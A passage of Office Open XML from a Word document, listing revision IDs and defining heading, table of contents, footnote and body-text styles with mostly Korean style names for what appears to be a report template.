    <w:rsid w:val="00CD34AD"/>
    <w:rsid w:val="00CD3A42"/>
    <w:rsid w:val="00CD50B6"/>
    <w:rsid w:val="00CD586F"/>
    <w:rsid w:val="00CD7675"/>
    <w:rsid w:val="00CE038B"/>
    <w:rsid w:val="00CE3C48"/>
    <w:rsid w:val="00CE4706"/>
    <w:rsid w:val="00CE50C9"/>
    <w:rsid w:val="00CE54D9"/>
    <w:rsid w:val="00CE7C48"/>
    <w:rsid w:val="00CF1F21"/>
    <w:rsid w:val="00CF3EB2"/>
    <w:rsid w:val="00CF5289"/>
    <w:rsid w:val="00CF651C"/>
    <w:rsid w:val="00D019A0"/>
    <w:rsid w:val="00D04BEB"/>
    <w:rsid w:val="00D10C6D"/>
    <w:rsid w:val="00D11617"/>
    <w:rsid w:val="00D1314F"/>
    <w:rsid w:val="00D15B19"/>
    <w:rsid w:val="00D17B59"/>
    <w:rsid w:val="00D20EC0"/>
    <w:rsid w:val="00D21D98"/>
    <w:rsid w:val="00D221E3"/>
    <w:rsid w:val="00D22CE1"/>
    <w:rsid w:val="00D239B3"/>
    <w:rsid w:val="00D23D53"/>
    <w:rsid w:val="00D30CC6"/>
    <w:rsid w:val="00D30F4D"/>
    <w:rsid w:val="00D332F0"/>
    <w:rsid w:val="00D34207"/>
    <w:rsid w:val="00D352BC"/>
    <w:rsid w:val="00D35EFD"/>
    <w:rsid w:val="00D460D7"/>
    <w:rsid w:val="00D463B5"/>
    <w:rsid w:val="00D477CD"/>
    <w:rsid w:val="00D50A30"/>
    <w:rsid w:val="00D53910"/>
    <w:rsid w:val="00D579DA"/>
    <w:rsid w:val="00D57A93"/>
    <w:rsid w:val="00D60E2D"/>
    <w:rsid w:val="00D62374"/>
    <w:rsid w:val="00D62C88"/>
    <w:rsid w:val="00D63B9C"/>
    <w:rsid w:val="00D65ED5"/>
    <w:rsid w:val="00D662A2"/>
    <w:rsid w:val="00D7086A"/>
    <w:rsid w:val="00D72B0E"/>
    <w:rsid w:val="00D75AFF"/>
    <w:rsid w:val="00D76F80"/>
    <w:rsid w:val="00D77308"/>
    <w:rsid w:val="00D803E0"/>
    <w:rsid w:val="00D811DC"/>
    <w:rsid w:val="00D826D4"/>
    <w:rsid w:val="00D828B8"/>
    <w:rsid w:val="00D86E81"/>
    <w:rsid w:val="00D86F0B"/>
    <w:rsid w:val="00D92759"/>
    <w:rsid w:val="00D93659"/>
    <w:rsid w:val="00D95078"/>
    <w:rsid w:val="00D96583"/>
    <w:rsid w:val="00DA1F20"/>
    <w:rsid w:val="00DA23E7"/>
    <w:rsid w:val="00DA767C"/>
    <w:rsid w:val="00DB0D7B"/>
    <w:rsid w:val="00DB2639"/>
    <w:rsid w:val="00DB374D"/>
    <w:rsid w:val="00DC030A"/>
    <w:rsid w:val="00DC14F2"/>
    <w:rsid w:val="00DC2460"/>
    <w:rsid w:val="00DC295F"/>
    <w:rsid w:val="00DC4746"/>
    <w:rsid w:val="00DC4AE6"/>
    <w:rsid w:val="00DC54E9"/>
    <w:rsid w:val="00DC6A80"/>
    <w:rsid w:val="00DC6FEB"/>
    <w:rsid w:val="00DC7147"/>
    <w:rsid w:val="00DC71C2"/>
    <w:rsid w:val="00DD168B"/>
    <w:rsid w:val="00DD1B56"/>
    <w:rsid w:val="00DD4D0F"/>
    <w:rsid w:val="00DD543E"/>
    <w:rsid w:val="00DD6985"/>
    <w:rsid w:val="00DD7039"/>
    <w:rsid w:val="00DD71D4"/>
    <w:rsid w:val="00DD76AD"/>
    <w:rsid w:val="00DE3B69"/>
    <w:rsid w:val="00DF12B8"/>
    <w:rsid w:val="00DF4446"/>
    <w:rsid w:val="00DF58BE"/>
    <w:rsid w:val="00DF6216"/>
    <w:rsid w:val="00DF768B"/>
    <w:rsid w:val="00E003DF"/>
    <w:rsid w:val="00E00A39"/>
    <w:rsid w:val="00E05401"/>
    <w:rsid w:val="00E1077E"/>
    <w:rsid w:val="00E13932"/>
    <w:rsid w:val="00E143AC"/>
    <w:rsid w:val="00E15BD4"/>
    <w:rsid w:val="00E20475"/>
    <w:rsid w:val="00E22378"/>
    <w:rsid w:val="00E237CF"/>
    <w:rsid w:val="00E24E16"/>
    <w:rsid w:val="00E250F2"/>
    <w:rsid w:val="00E32199"/>
    <w:rsid w:val="00E32534"/>
    <w:rsid w:val="00E325D1"/>
    <w:rsid w:val="00E32DED"/>
    <w:rsid w:val="00E37961"/>
    <w:rsid w:val="00E37A75"/>
    <w:rsid w:val="00E37D42"/>
    <w:rsid w:val="00E40B17"/>
    <w:rsid w:val="00E425E3"/>
    <w:rsid w:val="00E436AE"/>
    <w:rsid w:val="00E44832"/>
    <w:rsid w:val="00E45A79"/>
    <w:rsid w:val="00E45C2E"/>
    <w:rsid w:val="00E467AF"/>
    <w:rsid w:val="00E468DB"/>
    <w:rsid w:val="00E52A98"/>
    <w:rsid w:val="00E52CA1"/>
    <w:rsid w:val="00E52EDB"/>
    <w:rsid w:val="00E6012E"/>
    <w:rsid w:val="00E60416"/>
    <w:rsid w:val="00E60C3D"/>
    <w:rsid w:val="00E6172E"/>
    <w:rsid w:val="00E63A0E"/>
    <w:rsid w:val="00E67B02"/>
    <w:rsid w:val="00E71A0B"/>
    <w:rsid w:val="00E72D99"/>
    <w:rsid w:val="00E730DD"/>
    <w:rsid w:val="00E73B68"/>
    <w:rsid w:val="00E74F9C"/>
    <w:rsid w:val="00E81854"/>
    <w:rsid w:val="00E8224F"/>
    <w:rsid w:val="00E8596B"/>
    <w:rsid w:val="00E87A8B"/>
    <w:rsid w:val="00E87FA9"/>
    <w:rsid w:val="00E9033F"/>
    <w:rsid w:val="00E90C43"/>
    <w:rsid w:val="00E932F0"/>
    <w:rsid w:val="00E967EF"/>
    <w:rsid w:val="00E97C32"/>
    <w:rsid w:val="00EA07E4"/>
    <w:rsid w:val="00EA1BAE"/>
    <w:rsid w:val="00EA44F9"/>
    <w:rsid w:val="00EA473B"/>
    <w:rsid w:val="00EA47A3"/>
    <w:rsid w:val="00EA7A45"/>
    <w:rsid w:val="00EB08E4"/>
    <w:rsid w:val="00EB08FC"/>
    <w:rsid w:val="00EB0A9A"/>
    <w:rsid w:val="00EB2612"/>
    <w:rsid w:val="00EB662B"/>
    <w:rsid w:val="00EB6B90"/>
    <w:rsid w:val="00EB7499"/>
    <w:rsid w:val="00EC15FF"/>
    <w:rsid w:val="00EC203F"/>
    <w:rsid w:val="00EC679A"/>
    <w:rsid w:val="00ED0AC3"/>
    <w:rsid w:val="00ED1861"/>
    <w:rsid w:val="00ED2320"/>
    <w:rsid w:val="00ED2CC8"/>
    <w:rsid w:val="00ED2F5F"/>
    <w:rsid w:val="00ED6859"/>
    <w:rsid w:val="00ED6922"/>
    <w:rsid w:val="00ED794E"/>
    <w:rsid w:val="00EE0E72"/>
    <w:rsid w:val="00EE3DB5"/>
    <w:rsid w:val="00EE49B5"/>
    <w:rsid w:val="00EE5289"/>
    <w:rsid w:val="00EE56B6"/>
    <w:rsid w:val="00EE5A06"/>
    <w:rsid w:val="00EE5FE6"/>
    <w:rsid w:val="00EE783C"/>
    <w:rsid w:val="00EE7B92"/>
    <w:rsid w:val="00EF0228"/>
    <w:rsid w:val="00EF0C4D"/>
    <w:rsid w:val="00EF2892"/>
    <w:rsid w:val="00EF2C0D"/>
    <w:rsid w:val="00EF57BB"/>
    <w:rsid w:val="00EF6CE7"/>
    <w:rsid w:val="00F019EF"/>
    <w:rsid w:val="00F04C5D"/>
    <w:rsid w:val="00F05973"/>
    <w:rsid w:val="00F109D8"/>
    <w:rsid w:val="00F13AA6"/>
    <w:rsid w:val="00F165F1"/>
    <w:rsid w:val="00F17981"/>
    <w:rsid w:val="00F21E3D"/>
    <w:rsid w:val="00F22678"/>
    <w:rsid w:val="00F23F43"/>
    <w:rsid w:val="00F261B6"/>
    <w:rsid w:val="00F316BD"/>
    <w:rsid w:val="00F33C81"/>
    <w:rsid w:val="00F36E82"/>
    <w:rsid w:val="00F4259D"/>
    <w:rsid w:val="00F4395C"/>
    <w:rsid w:val="00F44FCD"/>
    <w:rsid w:val="00F46033"/>
    <w:rsid w:val="00F4636D"/>
    <w:rsid w:val="00F464A6"/>
    <w:rsid w:val="00F46F71"/>
    <w:rsid w:val="00F50DD2"/>
    <w:rsid w:val="00F54179"/>
    <w:rsid w:val="00F54849"/>
    <w:rsid w:val="00F55B07"/>
    <w:rsid w:val="00F562BF"/>
    <w:rsid w:val="00F56F8A"/>
    <w:rsid w:val="00F57788"/>
    <w:rsid w:val="00F63374"/>
    <w:rsid w:val="00F640A1"/>
    <w:rsid w:val="00F642E0"/>
    <w:rsid w:val="00F653D3"/>
    <w:rsid w:val="00F718AE"/>
    <w:rsid w:val="00F73538"/>
    <w:rsid w:val="00F73FB0"/>
    <w:rsid w:val="00F7460F"/>
    <w:rsid w:val="00F8517F"/>
    <w:rsid w:val="00F8751B"/>
    <w:rsid w:val="00F91C40"/>
    <w:rsid w:val="00F92932"/>
    <w:rsid w:val="00F95240"/>
    <w:rsid w:val="00F95A1B"/>
    <w:rsid w:val="00F96C43"/>
    <w:rsid w:val="00F96D03"/>
    <w:rsid w:val="00F973D4"/>
    <w:rsid w:val="00FA15F3"/>
    <w:rsid w:val="00FA379C"/>
    <w:rsid w:val="00FA3EF4"/>
    <w:rsid w:val="00FA4B6C"/>
    <w:rsid w:val="00FA7B3D"/>
    <w:rsid w:val="00FB0BF8"/>
    <w:rsid w:val="00FB239C"/>
    <w:rsid w:val="00FB2E9C"/>
    <w:rsid w:val="00FB3830"/>
    <w:rsid w:val="00FB5282"/>
    <w:rsid w:val="00FB6360"/>
    <w:rsid w:val="00FB6B32"/>
    <w:rsid w:val="00FC0530"/>
    <w:rsid w:val="00FC2425"/>
    <w:rsid w:val="00FC477B"/>
    <w:rsid w:val="00FC5559"/>
    <w:rsid w:val="00FD02AC"/>
    <w:rsid w:val="00FD0AA7"/>
    <w:rsid w:val="00FD3A85"/>
    <w:rsid w:val="00FD3BB4"/>
    <w:rsid w:val="00FD5FFE"/>
    <w:rsid w:val="00FD6D72"/>
    <w:rsid w:val="00FD7950"/>
    <w:rsid w:val="00FE1230"/>
    <w:rsid w:val="00FE1BB7"/>
    <w:rsid w:val="00FE1DD4"/>
    <w:rsid w:val="00FE2612"/>
    <w:rsid w:val="00FF278D"/>
    <w:rsid w:val="00FF3A8C"/>
    <w:rsid w:val="00FF4215"/>
    <w:rsid w:val="00FF732C"/>
    <w:rsid w:val="00FF73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8AF58"/>
  <w15:docId w15:val="{E19AD923-0933-48DD-A766-E5F16CC2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0026"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="1Char"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:leftChars="300" w:left="300" w:hangingChars="200" w:hanging="2000"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Level4TitleCtl4"/>
    <w:next w:val="a"/>
    <w:link w:val="4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D30D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5D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="제목 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="제목 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="제목 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="header"/>
    <w:aliases w:val="h"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="머리글 Char"/>
    <w:aliases w:val="h Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="ko-KR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="바닥글 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ko-KR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="바탕" w:hAnsi="Times New Roman"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Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="날짜 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char2"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F13AA6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:ind w:leftChars="400" w:left="1200" w:hangingChars="200" w:hanging="400"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level2TitleCtl2">
    <w:name w:val="본문 Level 2 Title [Ctl+2]"/>
    <w:basedOn w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="001F7928"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:wordWrap/>
      <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorHAnsi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level1TitleCtl1">
    <w:name w:val="본문 Level 1 Title [Ctl+1]"/>
    <w:basedOn w:val="10"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:ind w:hangingChars="177" w:hanging="177"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level3TitleCtl3">
    <w:name w:val="본문 Level 3 Title [Ctl+3]"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:rsid w:val="00A47D52"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:wordWrap/>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="0" w:left="538" w:firstLineChars="0" w:hanging="425"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level2Alt2">
    <w:name w:val="본문 Level 2 내용 [Alt+2]"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:spacing w:after="240"/>
      <w:ind w:leftChars="354" w:left="708"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:ind w:leftChars="354" w:left="708" w:rightChars="70" w:right="140" w:firstLine="1"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aa">
    <w:name w:val="본문 보고서(상세결과)"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="0029697E"/>
    <w:pPr>
      <w:ind w:leftChars="280" w:left="560"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level3Alt3">
    <w:name w:val="본문 Level 3 내용 [Alt+3]"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:spacing w:after="240"/>
      <w:ind w:leftChars="496" w:left="992"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="미주 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AC30AA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="709"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:before="240" w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="213" w:left="426" w:rightChars="212" w:right="424"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E425E3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
        <w:tab w:val="left" w:pos="1276"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="354" w:left="708" w:rightChars="212" w:right="424" w:firstLine="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1560"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:ind w:leftChars="567" w:left="1134"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level3">
    <w:name w:val="본문 Level 3 목록"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:wordWrap/>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:left="993" w:hanging="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char4">
    <w:name w:val="각주 텍스트 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D30D0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af0">
    <w:name w:val="첫페이지 날짜"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Title">
    <w:name w:val="Title 목차"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="52"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TitleCtSht">
    <w:name w:val="Title 표 (표 머리글) [Ct+Sh+t]"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level1Alt1">
    <w:name w:val="본문 Level 1 내용 [Alt+1]"/>
    <w:basedOn w:val="Level2Alt2"/>
    <w:rsid w:val="005D30D0"/>
    <w:pPr>
      <w:ind w:leftChars="213" w:left="426"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="바탕"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level4TitleCtl4">
    <w:name w:val="본문 Level 4 Title [Ctl+4]"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="001278AF"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:leftChars="71" w:left="566" w:hangingChars="212" w:hanging="424"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Level4Alt4">
